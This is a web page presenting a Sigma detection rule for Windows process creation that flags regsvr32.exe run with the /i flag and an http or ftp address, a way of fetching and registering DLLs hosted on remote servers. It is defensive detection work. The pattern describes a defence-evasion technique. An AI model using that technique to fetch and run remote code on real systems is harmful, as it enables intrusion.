Potentially Suspicious Regsvr32 HTTP/FTP Pattern
Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
Sigma rule (View on GitHub)
1title: Potentially Suspicious Regsvr32 HTTP/FTP Pattern
2id: 867356ee-9352-41c9-a8f2-1be690d78216
3related:
4 - id: 8e2b24c9-4add-46a0-b4bb-0057b4e6187d
5 type: obsolete
6status: test
7description: Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.
8references:
9 - https://twitter.com/mrd0x/status/1461041276514623491
10 - https://twitter.com/tccontre18/status/1480950986650832903
11 - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/
12author: Florian Roth (Nextron Systems)
13date: 2023-05-24
14modified: 2023-05-26
15tags:
16 - attack.defense-evasion
17 - attack.t1218.010
18logsource:
19 category: process_creation
20 product: windows
21detection:
22 selection_img:
23 - Image|endswith: '\regsvr32.exe'
24 - OriginalFileName: 'REGSVR32.EXE'
25 selection_flag:
26 CommandLine|contains:
27 - ' /i'
28 - ' -i'
29 selection_protocol:
30 CommandLine|contains:
31 - 'ftp'
32 - 'http'
33 condition: all of selection_*
34falsepositives:
35 - Unknown
36level: medium
References
-
Regsvr32.exe is a living-of-the-land file containing unexpected functionality that can be abused by attackers; this page lists all its use cases.
Read More
Related rules
- DNS Query Request By Regsvr32.EXE
- HTML Help HH.EXE Suspicious Child Process
- Network Connection Initiated By Regsvr32.EXE
- Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
- Potential EmpireMonkey Activity